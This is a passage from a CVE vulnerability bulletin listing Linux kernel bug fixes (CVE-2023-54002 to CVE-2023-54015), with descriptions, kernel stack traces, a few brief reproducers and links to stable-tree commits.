? memdup_user+0xab/0xc0 ? PTR_ERR+0x17/0x20 btrfs_ioctl_add_dev+0x2ee/0x320 btrfs_ioctl+0x9d5/0x10d0 ? btrfs_ioctl_encoded_write+0xb80/0xb80 __x64_sys_ioctl+0x197/0x210 do_syscall_64+0x3c/0xb0 entry_SYSCALL_64_after_hwframe+0x63/0xcd An example of the failed assertion is below, which shows that the paused balance is also needed to be checked. root@syzkaller:/home/xsk# ./repro Failed to add device /dev/vda, errno 14 Failed to add device /dev/vda, errno 14 Failed to add device /dev/vda, errno 14 Failed to add device /dev/vda, errno 14 Failed to add device /dev/vda, errno 14 Failed to add device /dev/vda, errno 14 Failed to add device /dev/vda, errno 14 Failed to add device /dev/vda, errno 14 Failed to add device /dev/vda, errno 14 [ 416.611428][ T7970] BTRFS info (device loop0): fs_info exclusive_operation: 0 Failed to add device /dev/vda, errno 14 [ 416.613973][ T7971] BTRFS info (device loop0): fs_info exclusive_operation: 3 Failed to add device /dev/vda, errno 14 [ 416.615456][ T7972] BTRFS info (device loop0): fs_info exclusive_operation: 3 Failed to add device /dev/vda, errno 14 [ 416.617528][ T7973] BTRFS info (device loop0): fs_info exclusive_operation: 3 Failed to add device /dev/vda, errno 14 [ 416.618359][ T7974] BTRFS info (device loop0): fs_info exclusive_operation: 3 Failed to add device /dev/vda, errno 14 [ 416.622589][ T7975] BTRFS info (device loop0): fs_info exclusive_operation: 3 Failed to add device /dev/vda, errno 14 [ 416.624034][ T7976] BTRFS info (device loop0): fs_info exclusive_operation: 3 Failed to add device /dev/vda, errno 14 [ 416.626420][ T7977] BTRFS info (device loop0): fs_info exclusive_operation: 3 Failed to add device /dev/vda, errno 14 [ 416.627643][ T7978] BTRFS info (device loop0): fs_info exclusive_operation: 3 Failed to add device /dev/vda, errno 14 [ 416.629006][ T7979] BTRFS info (device loop0): fs_info exclusive_operation: 3 [ 416.630298][ T7980] BTRFS info (device loop0): fs_info exclusive_operation: 3 Fai ---truncated--- | 2025-12-24 | not yet calculated | CVE-2023-54002 | https://git.kernel.org/stable/c/17eaeee4c5f24946aad0298d51f32981c3161d13 https://git.kernel.org/stable/c/7877dc1136ada770622d22041be306539902951b https://git.kernel.org/stable/c/6062e9e335a3bf409b5118bfe4cc10aff4b6adb1 https://git.kernel.org/stable/c/ac868bc9d136cde6e3eb5de77019a63d57a540ff |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: RDMA/core: Fix GID entry ref leak when create_ah fails If AH create request fails, release sgid_attr to avoid GID entry referrence leak reported while releasing GID table | 2025-12-24 | not yet calculated | CVE-2023-54003 | https://git.kernel.org/stable/c/9c46c49ad3ffe84121715d392b5a0a94f9f10669 https://git.kernel.org/stable/c/d1b9b3191697a80aca8e247320eba46f24d41d18 https://git.kernel.org/stable/c/e97ff11b396c320d2cc025b09741ba432fcb20a2 https://git.kernel.org/stable/c/370280c65c28a515b841c9f2c08524f06182510c https://git.kernel.org/stable/c/632d6baf8884d803e598bf5164008d23fd9b736c https://git.kernel.org/stable/c/aca3b0fa3d04b40c96934d86cc224cccfa7ea8e0 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: udplite: Fix NULL pointer dereference in __sk_mem_raise_allocated(). syzbot reported [0] a null-ptr-deref in sk_get_rmem0() while using IPPROTO_UDPLITE (0x88): 14:25:52 executing program 1: r0 = socket$inet6(0xa, 0x80002, 0x88) We had a similar report [1] for probably sk_memory_allocated_add() in __sk_mem_raise_allocated(), and commit c915fe13cbaa ("udplite: fix NULL pointer dereference") fixed it by setting .memory_allocated for udplite_prot and udplitev6_prot. To fix the variant, we need to set either .sysctl_wmem_offset or .sysctl_rmem. Now UDP and UDPLITE share the same value for .memory_allocated, so we use the same .sysctl_wmem_offset for UDP and UDPLITE. [0]: general protection fault, probably for non-canonical address 0xdffffc0000000000: 0000 [#1] PREEMPT SMP KASAN KASAN: null-ptr-deref in range [0x0000000000000000-0x0000000000000007] CPU: 0 PID: 6829 Comm: syz-executor.1 Not tainted 6.4.0-rc2-syzkaller #0 Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 04/28/2023 RIP: 0010:sk_get_rmem0 include/net/sock.h:2907 [inline] RIP: 0010:__sk_mem_raise_allocated+0x806/0x17a0 net/core/sock.c:3006 Code: c1 ea 03 80 3c 02 00 0f 85 23 0f 00 00 48 8b 44 24 08 48 8b 98 38 01 00 00 48 b8 00 00 00 00 00 fc ff df 48 89 da 48 c1 ea 03 <0f> b6 14 02 48 89 d8 83 e0 07 83 c0 03 38 d0 0f 8d 6f 0a 00 00 8b RSP: 0018:ffffc90005d7f450 EFLAGS: 00010246 RAX: dffffc0000000000 RBX: 0000000000000000 RCX: ffffc90004d92000 RDX: 0000000000000000 RSI: ffffffff88066482 RDI: ffffffff8e2ccbb8 RBP: ffff8880173f7000 R08: 0000000000000005 R09: 0000000000000000 R10: 0000000000000000 R11: 0000000000000000 R12: 0000000000030000 R13: 0000000000000001 R14: 0000000000000340 R15: 0000000000000001 FS: 0000000000000000(0000) GS:ffff8880b9800000(0063) knlGS:00000000f7f1cb40 CS: 0010 DS: 002b ES: 002b CR0: 0000000080050033 CR2: 000000002e82f000 CR3: 0000000034ff0000 CR4: 00000000003506f0 Call Trace: <TASK> __sk_mem_schedule+0x6c/0xe0 net/core/sock.c:3077 udp_rmem_schedule net/ipv4/udp.c:1539 [inline] __udp_enqueue_schedule_skb+0x776/0xb30 net/ipv4/udp.c:1581 __udpv6_queue_rcv_skb net/ipv6/udp.c:666 [inline] udpv6_queue_rcv_one_skb+0xc39/0x16c0 net/ipv6/udp.c:775 udpv6_queue_rcv_skb+0x194/0xa10 net/ipv6/udp.c:793 __udp6_lib_mcast_deliver net/ipv6/udp.c:906 [inline] __udp6_lib_rcv+0x1bda/0x2bd0 net/ipv6/udp.c:1013 ip6_protocol_deliver_rcu+0x2e7/0x1250 net/ipv6/ip6_input.c:437 ip6_input_finish+0x150/0x2f0 net/ipv6/ip6_input.c:482 NF_HOOK include/linux/netfilter.h:303 [inline] NF_HOOK include/linux/netfilter.h:297 [inline] ip6_input+0xa0/0xd0 net/ipv6/ip6_input.c:491 ip6_mc_input+0x40b/0xf50 net/ipv6/ip6_input.c:585 dst_input include/net/dst.h:468 [inline] ip6_rcv_finish net/ipv6/ip6_input.c:79 [inline] NF_HOOK include/linux/netfilter.h:303 [inline] NF_HOOK include/linux/netfilter.h:297 [inline] ipv6_rcv+0x250/0x380 net/ipv6/ip6_input.c:309 __netif_receive_skb_one_core+0x114/0x180 net/core/dev.c:5491 __netif_receive_skb+0x1f/0x1c0 net/core/dev.c:5605 netif_receive_skb_internal net/core/dev.c:5691 [inline] netif_receive_skb+0x133/0x7a0 net/core/dev.c:5750 tun_rx_batched+0x4b3/0x7a0 drivers/net/tun.c:1553 tun_get_user+0x2452/0x39c0 drivers/net/tun.c:1989 tun_chr_write_iter+0xdf/0x200 drivers/net/tun.c:2035 call_write_iter include/linux/fs.h:1868 [inline] new_sync_write fs/read_write.c:491 [inline] vfs_write+0x945/0xd50 fs/read_write.c:584 ksys_write+0x12b/0x250 fs/read_write.c:637 do_syscall_32_irqs_on arch/x86/entry/common.c:112 [inline] __do_fast_syscall_32+0x65/0xf0 arch/x86/entry/common.c:178 do_fast_syscall_32+0x33/0x70 arch/x86/entry/common.c:203 entry_SYSENTER_compat_after_hwframe+0x70/0x82 RIP: 0023:0xf7f21579 Code: b8 01 10 06 03 74 b4 01 10 07 03 74 b0 01 10 08 03 74 d8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 51 52 55 89 e5 0f 34 cd 80 <5d> 5a 59 c3 90 90 90 90 8d b4 26 00 00 00 00 8d b4 26 00 00 00 00 ---truncated--- | 2025-12-24 | not yet calculated | CVE-2023-54004 | https://git.kernel.org/stable/c/cc56de054d828935aa37734b479f82fa34b5f9bd https://git.kernel.org/stable/c/7e3ae83371a4809da6fa3f10ccc430eecef3034a https://git.kernel.org/stable/c/5014b64e369bdf997935b132a1ac4d64b6e47ad4 https://git.kernel.org/stable/c/387bd0a3af3bdd2b16f8dbef0c9fcccac63000a4 https://git.kernel.org/stable/c/2a112f04629f7839e7cb509b27b8d3b735afe255 https://git.kernel.org/stable/c/f04c8eaf45e7dcdfccba936506b1ec592a369fb9 https://git.kernel.org/stable/c/ad42a35bdfc6d3c0fc4cb4027d7b2757ce665665 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: binder: fix memory leak in binder_init() In binder_init(), the destruction of binder_alloc_shrinker_init() is not performed in the wrong path, which will cause memory leaks. So this commit introduces binder_alloc_shrinker_exit() and calls it in the wrong path to fix that. | 2025-12-24 | not yet calculated | CVE-2023-54005 | https://git.kernel.org/stable/c/486dd742ba186ea333664c517d6775b06b1448ca https://git.kernel.org/stable/c/ceb0f8cc987fb3d25c06b9662e08a42f99651207 https://git.kernel.org/stable/c/b97dad01c12169991f895de3d4f61b8115d12bab https://git.kernel.org/stable/c/d7e5e2b87f5d27469075b6326b6b358e38cd9dcb https://git.kernel.org/stable/c/03eebad96233397f951d8e9fafd82a1674a77284 https://git.kernel.org/stable/c/f11a26633eb6d3bb24a10b1bacc4e4a9b0c6389f https://git.kernel.org/stable/c/ee95051c0c1928051f86198bf5e554277a53b26b https://git.kernel.org/stable/c/adb9743d6a08778b78d62d16b4230346d3508986 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: af_unix: Fix data-race around unix_tot_inflight. unix_tot_inflight is changed under spin_lock(unix_gc_lock), but unix_release_sock() reads it locklessly. Let's use READ_ONCE() for unix_tot_inflight. Note that the writer side was marked by commit 9d6d7f1cb67c ("af_unix: annote lockless accesses to unix_tot_inflight & gc_in_progress") BUG: KCSAN: data-race in unix_inflight / unix_release_sock write (marked) to 0xffffffff871852b8 of 4 bytes by task 123 on cpu 1: unix_inflight+0x130/0x180 net/unix/scm.c:64 unix_attach_fds+0x137/0x1b0 net/unix/scm.c:123 unix_scm_to_skb net/unix/af_unix.c:1832 [inline] unix_dgram_sendmsg+0x46a/0x14f0 net/unix/af_unix.c:1955 sock_sendmsg_nosec net/socket.c:724 [inline] sock_sendmsg+0x148/0x160 net/socket.c:747 ____sys_sendmsg+0x4e4/0x610 net/socket.c:2493 ___sys_sendmsg+0xc6/0x140 net/socket.c:2547 __sys_sendmsg+0x94/0x140 net/socket.c:2576 __do_sys_sendmsg net/socket.c:2585 [inline] __se_sys_sendmsg net/socket.c:2583 [inline] __x64_sys_sendmsg+0x45/0x50 net/socket.c:2583 do_syscall_x64 arch/x86/entry/common.c:50 [inline] do_syscall_64+0x3b/0x90 arch/x86/entry/common.c:80 entry_SYSCALL_64_after_hwframe+0x72/0xdc read to 0xffffffff871852b8 of 4 bytes by task 4891 on cpu 0: unix_release_sock+0x608/0x910 net/unix/af_unix.c:671 unix_release+0x59/0x80 net/unix/af_unix.c:1058 __sock_release+0x7d/0x170 net/socket.c:653 sock_close+0x19/0x30 net/socket.c:1385 __fput+0x179/0x5e0 fs/file_table.c:321 ____fput+0x15/0x20 fs/file_table.c:349 task_work_run+0x116/0x1a0 kernel/task_work.c:179 resume_user_mode_work include/linux/resume_user_mode.h:49 [inline] exit_to_user_mode_loop kernel/entry/common.c:171 [inline] exit_to_user_mode_prepare+0x174/0x180 kernel/entry/common.c:204 __syscall_exit_to_user_mode_work kernel/entry/common.c:286 [inline] syscall_exit_to_user_mode+0x1a/0x30 kernel/entry/common.c:297 do_syscall_64+0x4b/0x90 arch/x86/entry/common.c:86 entry_SYSCALL_64_after_hwframe+0x72/0xdc value changed: 0x00000000 -> 0x00000001 Reported by Kernel Concurrency Sanitizer on: CPU: 0 PID: 4891 Comm: systemd-coredum Not tainted 6.4.0-rc5-01219-gfa0e21fa4443 #5 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.0-0-gd239552ce722-prebuilt.qemu.org 04/01/2014 | 2025-12-24 | not yet calculated | CVE-2023-54006 | https://git.kernel.org/stable/c/31b46d5e7c4e295bd112960614a66a177a057dca https://git.kernel.org/stable/c/20aa8325464d8905450089eed96ca102a074d853 https://git.kernel.org/stable/c/5d91b7891f4a9a9d69d75e9f44ab4bf1f3b11840 https://git.kernel.org/stable/c/cf29b42766ad4af2ae6a449f583796951551b48d https://git.kernel.org/stable/c/e5edc6e44a882c0458878ab10eaddfe60ac34e57 https://git.kernel.org/stable/c/2d8933ca863e252fb09ad0be483255e3dfeb1f54 https://git.kernel.org/stable/c/afc284a4a781defbb12b2a40427fae34c3d20e17 https://git.kernel.org/stable/c/ade32bd8a738d7497ffe9743c46728db26740f78 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: vmci_host: fix a race condition in vmci_host_poll() causing GPF During fuzzing, a general protection fault is observed in vmci_host_poll(). general protection fault, probably for non-canonical address 0xdffffc0000000019: 0000 [#1] PREEMPT SMP KASAN KASAN: null-ptr-deref in range [0x00000000000000c8-0x00000000000000cf] RIP: 0010:__lock_acquire+0xf3/0x5e00 kernel/locking/lockdep.c:4926 <- omitting registers -> Call Trace: <TASK> lock_acquire+0x1a4/0x4a0 kernel/locking/lockdep.c:5672 __raw_spin_lock_irqsave include/linux/spinlock_api_smp.h:110 [inline] _raw_spin_lock_irqsave+0xb3/0x100 kernel/locking/spinlock.c:162 add_wait_queue+0x3d/0x260 kernel/sched/wait.c:22 poll_wait include/linux/poll.h:49 [inline] vmci_host_poll+0xf8/0x2b0 drivers/misc/vmw_vmci/vmci_host.c:174 vfs_poll include/linux/poll.h:88 [inline] do_pollfd fs/select.c:873 [inline] do_poll fs/select.c:921 [inline] do_sys_poll+0xc7c/0x1aa0 fs/select.c:1015 __do_sys_ppoll fs/select.c:1121 [inline] __se_sys_ppoll+0x2cc/0x330 fs/select.c:1101 do_syscall_x64 arch/x86/entry/common.c:51 [inline] do_syscall_64+0x4e/0xa0 arch/x86/entry/common.c:82 entry_SYSCALL_64_after_hwframe+0x46/0xb0 Example thread interleaving that causes the general protection fault is as follows: CPU1 (vmci_host_poll) CPU2 (vmci_host_do_init_context) ----- ----- // Read uninitialized context context = vmci_host_dev->context; // Initialize context vmci_host_dev->context = vmci_ctx_create(); vmci_host_dev->ct_type = VMCIOBJ_CONTEXT; if (vmci_host_dev->ct_type == VMCIOBJ_CONTEXT) { // Dereferencing the wrong pointer poll_wait(..., &context->host_context); } In this scenario, vmci_host_poll() reads vmci_host_dev->context first, and then reads vmci_host_dev->ct_type to check that vmci_host_dev->context is initialized. However, since these two reads are not atomically executed, there is a chance of a race condition as described above. To fix this race condition, read vmci_host_dev->context after checking the value of vmci_host_dev->ct_type so that vmci_host_poll() always reads an initialized context. | 2025-12-24 | not yet calculated | CVE-2023-54007 | https://git.kernel.org/stable/c/2053e93ac15519ed1f1fe6eba79a33a4963be4a3 https://git.kernel.org/stable/c/ca0f4ad2b7a36c799213ef0a213eb977a51e03dc https://git.kernel.org/stable/c/85b4aa4eb2e3a0da111fd0a1cdbf00f986ac6b6b https://git.kernel.org/stable/c/770d30b1355c6c8879973dd054fca9168def182c https://git.kernel.org/stable/c/d22b2a35729cb1de311cb650cd67518a24e13fc9 https://git.kernel.org/stable/c/67e35824f861a05b44b19d38e16a83f653bd9d92 https://git.kernel.org/stable/c/ab64bd32b9fac27ff4737d63711b9db5e5462448 https://git.kernel.org/stable/c/ae13381da5ff0e8e084c0323c3cc0a945e43e9c7 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: virtio_vdpa: build affinity masks conditionally We try to build affinity mask via create_affinity_masks() unconditionally which may lead several issues: - the affinity mask is not used for parent without affinity support (only VDUSE support the affinity now) - the logic of create_affinity_masks() might not work for devices other than block. For example it's not rare in the networking device where the number of queues could exceed the number of CPUs. Such case breaks the current affinity logic which is based on group_cpus_evenly() who assumes the number of CPUs are not less than the number of groups. This can trigger a warning[1]: if (ret >= 0) WARN_ON(nr_present + nr_others < numgrps); Fixing this by only build the affinity masks only when - Driver passes affinity descriptor, driver like virtio-blk can make sure to limit the number of queues when it exceeds the number of CPUs - Parent support affinity setting config ops This help to avoid the warning. More optimizations could be done on top. [1] [ 682.146655] WARNING: CPU: 6 PID: 1550 at lib/group_cpus.c:400 group_cpus_evenly+0x1aa/0x1c0 [ 682.146668] CPU: 6 PID: 1550 Comm: vdpa Not tainted 6.5.0-rc5jason+ #79 [ 682.146671] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.2-0-gea1b7a073390-prebuilt.qemu.org 04/01/2014 [ 682.146673] RIP: 0010:group_cpus_evenly+0x1aa/0x1c0 [ 682.146676] Code: 4c 89 e0 5b 5d 41 5c 41 5d 41 5e c3 cc cc cc cc e8 1b c4 74 ff 48 89 ef e8 13 ac 98 ff 4c 89 e7 45 31 e4 e8 08 ac 98 ff eb c2 <0f> 0b eb b6 e8 fd 05 c3 00 45 31 e4 eb e5 cc cc cc cc cc cc cc cc [ 682.146679] RSP: 0018:ffffc9000215f498 EFLAGS: 00010293 [ 682.146682] RAX: 000000000001f1e0 RBX: 0000000000000041 RCX: 0000000000000000 [ 682.146684] RDX: ffff888109922058 RSI: 0000000000000041 RDI: 0000000000000030 [ 682.146686] RBP: ffff888109922058 R08: ffffc9000215f498 R09: ffffc9000215f4a0 [ 682.146687] R10: 00000000000198d0 R11: 0000000000000030 R12: ffff888107e02800 [ 682.146689] R13: 0000000000000030 R14: 0000000000000030 R15: 0000000000000041 [ 682.146692] FS: 00007fef52315740(0000) GS:ffff888237380000(0000) knlGS:0000000000000000 [ 682.146695] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 682.146696] CR2: 00007fef52509000 CR3: 0000000110dbc004 CR4: 0000000000370ee0 [ 682.146698] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 [ 682.146700] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 [ 682.146701] Call Trace: [ 682.146703] <TASK> [ 682.146705] ? __warn+0x7b/0x130 [ 682.146709] ? group_cpus_evenly+0x1aa/0x1c0 [ 682.146712] ? report_bug+0x1c8/0x1e0 [ 682.146717] ? handle_bug+0x3c/0x70 [ 682.146721] ? exc_invalid_op+0x14/0x70 [ 682.146723] ? asm_exc_invalid_op+0x16/0x20 [ 682.146727] ? group_cpus_evenly+0x1aa/0x1c0 [ 682.146729] ? group_cpus_evenly+0x15c/0x1c0 [ 682.146731] create_affinity_masks+0xaf/0x1a0 [ 682.146735] virtio_vdpa_find_vqs+0x83/0x1d0 [ 682.146738] ? __pfx_default_calc_sets+0x10/0x10 [ 682.146742] virtnet_find_vqs+0x1f0/0x370 [ 682.146747] virtnet_probe+0x501/0xcd0 [ 682.146749] ? vp_modern_get_status+0x12/0x20 [ 682.146751] ? get_cap_addr.isra.0+0x10/0xc0 [ 682.146754] virtio_dev_probe+0x1af/0x260 [ 682.146759] really_probe+0x1a5/0x410 | 2025-12-24 | not yet calculated | CVE-2023-54008 | https://git.kernel.org/stable/c/5f2592243ccd5bb5341f59be409ccfdd586841f3 https://git.kernel.org/stable/c/628b53fc66ca1910a3cb53c3c7e44e59750c3668 https://git.kernel.org/stable/c/ae15aceaa98ad9499763923f7890e345d9f46b60 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: i2c: cadence: cdns_i2c_master_xfer(): Fix runtime PM leak on error path The cdns_i2c_master_xfer() function gets a runtime PM reference when the function is entered. This reference is released when the function is exited. There is currently one error path where the function exits directly, which leads to a leak of the runtime PM reference. Make sure that this error path also releases the runtime PM reference. | 2025-12-24 | not yet calculated | CVE-2023-54009 | https://git.kernel.org/stable/c/fd7bf900c3215c77f6d779d1532faa22b79f2430 https://git.kernel.org/stable/c/2d65599ad1e4f195bbb80752cd5cbc2f1a018dba https://git.kernel.org/stable/c/a712b5a95270e62209f5c2201c774f708f75234e https://git.kernel.org/stable/c/d0dc6553b5f2b1272c01b0eba5fe2fd89cc59f44 https://git.kernel.org/stable/c/5b14d7c6ba0ba5d167f5ef588ca6dfe1af6dd0aa https://git.kernel.org/stable/c/ae1664f04f504a998737f5bb563f16b44357bcca |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ACPICA: ACPICA: check null return of ACPI_ALLOCATE_ZEROED in acpi_db_display_objects ACPICA commit 0d5f467d6a0ba852ea3aad68663cbcbd43300fd4 ACPI_ALLOCATE_ZEROED may fails, object_info might be null and will cause null pointer dereference later. | 2025-12-24 | not yet calculated | CVE-2023-54010 | https://git.kernel.org/stable/c/c9fcb2cfcbd4d7018d9f659f5b670f5b727d1968 https://git.kernel.org/stable/c/35d67ffad6f5d78dbd800d354f5334c7b71a19e0 https://git.kernel.org/stable/c/c409eb45f5ddae2e3b3faa76cefc87f3cd0d0e88 https://git.kernel.org/stable/c/978e0d05547ae707d51a942fc7e85a34e181ee6f https://git.kernel.org/stable/c/d997c920a5305b37f0b8a40501b5aca10d099ecd https://git.kernel.org/stable/c/fee6133490091492dc66bcf71479bd53bd17a7d2 https://git.kernel.org/stable/c/ed2e1e85644ca3d351324e9927a538c8af4df654 https://git.kernel.org/stable/c/ae5a0eccc85fc960834dd66e3befc2728284b86c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: scsi: mpi3mr: Fix an issue found by KASAN Write only correct size (32 instead of 64 bytes). | 2025-12-24 | not yet calculated | CVE-2023-54011 | https://git.kernel.org/stable/c/abfe73c16b295f2213e9bfc0a1df232056032448 https://git.kernel.org/stable/c/c8755f913a2fc9c168d108ea8c5af04716e8c4a5 https://git.kernel.org/stable/c/ae7d45f5283d30274039b95d3e6d53d33c66e991 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: fix stack overflow when LRO is disabled for virtual interfaces When the virtual interface's feature is updated, it synchronizes the updated feature for its own lower interface. This propagation logic should be worked as the iteration, not recursively. But it works recursively due to the netdev notification unexpectedly. This problem occurs when it disables LRO only for the team and bonding interface type. team0 | +------+------+-----+-----+ | | | | | team1 team2 team3 ... team200 If team0's LRO feature is updated, it generates the NETDEV_FEAT_CHANGE event to its own lower interfaces(team1 ~ team200). It is worked by netdev_sync_lower_features(). So, the NETDEV_FEAT_CHANGE notification logic of each lower interface work iteratively. But generated NETDEV_FEAT_CHANGE event is also sent to the upper interface too. upper interface(team0) generates the NETDEV_FEAT_CHANGE event for its own lower interfaces again. lower and upper interfaces receive this event and generate this event again and again. So, the stack overflow occurs. But it is not the infinite loop issue. Because the netdev_sync_lower_features() updates features before generating the NETDEV_FEAT_CHANGE event. Already synchronized lower interfaces skip notification logic. So, it is just the problem that iteration logic is changed to the recursive unexpectedly due to the notification mechanism. Reproducer: ip link add team0 type team ethtool -K team0 lro on for i in {1..200} do ip link add team$i master team0 type team ethtool -K team$i lro on done ethtool -K team0 lro off In order to fix it, the notifier_ctx member of bonding/team is introduced. | 2025-12-24 | not yet calculated | CVE-2023-54012 | https://git.kernel.org/stable/c/9ea0c5f90a27b5b884d880e146e0f65f3052e401 https://git.kernel.org/stable/c/4bb955c4d2830a58c08e2a48ab75d75368e3ff36 https://git.kernel.org/stable/c/cf3b5cd7127cc10c5b12400c545f263f0e5e715c https://git.kernel.org/stable/c/ed66e6327a69fec95034cda2ac5b6a57b8b3b622 https://git.kernel.org/stable/c/6bf00bb3dc7e5b9fb05488e11616e65d64e975fa https://git.kernel.org/stable/c/ae9b15fbe63447bc1d3bba3769f409d17ca6fdf6 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: interconnect: Fix locking for runpm vs reclaim For cases where icc_bw_set() can be called in callbaths that could deadlock against shrinker/reclaim, such as runpm resume, we need to decouple the icc locking. Introduce a new icc_bw_lock for cases where we need to serialize bw aggregation and update to decouple that from paths that require memory allocation such as node/link creation/ destruction. Fixes this lockdep splat: ====================================================== WARNING: possible circular locking dependency detected 6.2.0-rc8-debug+ #554 Not tainted ------------------------------------------------------ ring0/132 is trying to acquire lock: ffffff80871916d0 (&gmu->lock){+.+.}-{3:3}, at: a6xx_pm_resume+0xf0/0x234 but task is already holding lock: ffffffdb5aee57e8 (dma_fence_map){++++}-{0:0}, at: msm_job_run+0x68/0x150 which lock already depends on the new lock. the existing dependency chain (in reverse order) is: -> #4 (dma_fence_map){++++}-{0:0}: __dma_fence_might_wait+0x74/0xc0 dma_resv_lockdep+0x1f4/0x2f4 do_one_initcall+0x104/0x2bc kernel_init_freeable+0x344/0x34c kernel_init+0x30/0x134 ret_from_fork+0x10/0x20 -> #3 (mmu_notifier_invalidate_range_start){+.+.}-{0:0}: fs_reclaim_acquire+0x80/0xa8 slab_pre_alloc_hook.constprop.0+0x40/0x25c __kmem_cache_alloc_node+0x60/0x1cc __kmalloc+0xd8/0x100 topology_parse_cpu_capacity+0x8c/0x178 get_cpu_for_node+0x88/0xc4 parse_cluster+0x1b0/0x28c parse_cluster+0x8c/0x28c init_cpu_topology+0x168/0x188 smp_prepare_cpus+0x24/0xf8 kernel_init_freeable+0x18c/0x34c kernel_init+0x30/0x134 ret_from_fork+0x10/0x20 -> #2 (fs_reclaim){+.+.}-{0:0}: __fs_reclaim_acquire+0x3c/0x48 fs_reclaim_acquire+0x54/0xa8 slab_pre_alloc_hook.constprop.0+0x40/0x25c __kmem_cache_alloc_node+0x60/0x1cc __kmalloc+0xd8/0x100 kzalloc.constprop.0+0x14/0x20 icc_node_create_nolock+0x4c/0xc4 icc_node_create+0x38/0x58 qcom_icc_rpmh_probe+0x1b8/0x248 platform_probe+0x70/0xc4 really_probe+0x158/0x290 __driver_probe_device+0xc8/0xe0 driver_probe_device+0x44/0x100 __driver_attach+0xf8/0x108 bus_for_each_dev+0x78/0xc4 driver_attach+0x2c/0x38 bus_add_driver+0xd0/0x1d8 driver_register+0xbc/0xf8 __platform_driver_register+0x30/0x3c qnoc_driver_init+0x24/0x30 do_one_initcall+0x104/0x2bc kernel_init_freeable+0x344/0x34c kernel_init+0x30/0x134 ret_from_fork+0x10/0x20 -> #1 (icc_lock){+.+.}-{3:3}: __mutex_lock+0xcc/0x3c8 mutex_lock_nested+0x30/0x44 icc_set_bw+0x88/0x2b4 _set_opp_bw+0x8c/0xd8 _set_opp+0x19c/0x300 dev_pm_opp_set_opp+0x84/0x94 a6xx_gmu_resume+0x18c/0x804 a6xx_pm_resume+0xf8/0x234 adreno_runtime_resume+0x2c/0x38 pm_generic_runtime_resume+0x30/0x44 __rpm_callback+0x15c/0x174 rpm_callback+0x78/0x7c rpm_resume+0x318/0x524 __pm_runtime_resume+0x78/0xbc adreno_load_gpu+0xc4/0x17c msm_open+0x50/0x120 drm_file_alloc+0x17c/0x228 drm_open_helper+0x74/0x118 drm_open+0xa0/0x144 drm_stub_open+0xd4/0xe4 chrdev_open+0x1b8/0x1e4 do_dentry_open+0x2f8/0x38c vfs_open+0x34/0x40 path_openat+0x64c/0x7b4 do_filp_open+0x54/0xc4 do_sys_openat2+0x9c/0x100 do_sys_open+0x50/0x7c __arm64_sys_openat+0x28/0x34 invoke_syscall+0x8c/0x128 el0_svc_common.constprop.0+0xa0/0x11c do_el0_ ---truncated--- | 2025-12-24 | not yet calculated | CVE-2023-54013 | https://git.kernel.org/stable/c/2f3a124696d43de3c837f87a9f767c56ee86cf2a https://git.kernel.org/stable/c/af42269c3523492d71ebbe11fefae2653e9cdc78 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: scsi: qla2xxx: Check valid rport returned by fc_bsg_to_rport() Klocwork reported warning of rport maybe NULL and will be dereferenced. rport returned by call to fc_bsg_to_rport() could be NULL and dereferenced. Check valid rport returned by fc_bsg_to_rport(). | 2025-12-24 | not yet calculated | CVE-2023-54014 | https://git.kernel.org/stable/c/f35bd94b4e11c41de90cd0fa72c9062e8196822f https://git.kernel.org/stable/c/ccd3bc595bda67db5a347b9050c2df28f292d3fb https://git.kernel.org/stable/c/1b7e5bdf2be22ae8c61bdca5a5f96ec2746e9639 https://git.kernel.org/stable/c/921d6844625527a92d1178262a633cc88a8e61bd https://git.kernel.org/stable/c/1ccd52b790a66b8b5f75c87eab8c3a37f941a2bf https://git.kernel.org/stable/c/e466930717ef18c112585a39fc6174d8eb441df5 https://git.kernel.org/stable/c/ced5460eae772e847debbc0b65ef93aedab92d3f https://git.kernel.org/stable/c/af73f23a27206ffb3c477cac75b5fcf03410556e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net/mlx5: Devcom, fix error flow in mlx5_devcom_register_device In case devcom allocation is failed, mlx5 is always freeing the priv. However, this priv might have been allocated by a different thread, and freeing it might lead to use-after-free bugs. Fix it by freeing the priv only in case it was allocated by the running thread. | 2025-12-24 | not yet calculated | CVE-2023-54015 | https://git.kernel.org/stable/c/3dfc1004d9afbf689087ae1eafd88f55481984c7 https://git.kernel.org/stable/c/d4d10a6df1529b3f446cdada5c25e065f4712756 https://git.kernel.org/stable/c/1e755065368000205e6683fa924b2654e99f573b https://git.kernel.org/stable/c/eaa365c10459052cbe3e44caa4ad760cb93bd435 https://git.kernel.org/stable/c/a3a516caef2c5be2f4d171890a8b3415bfab4e5e https://git.kernel.org/stable/c/af87194352cad882d787d06fb7efa714acd95427 |
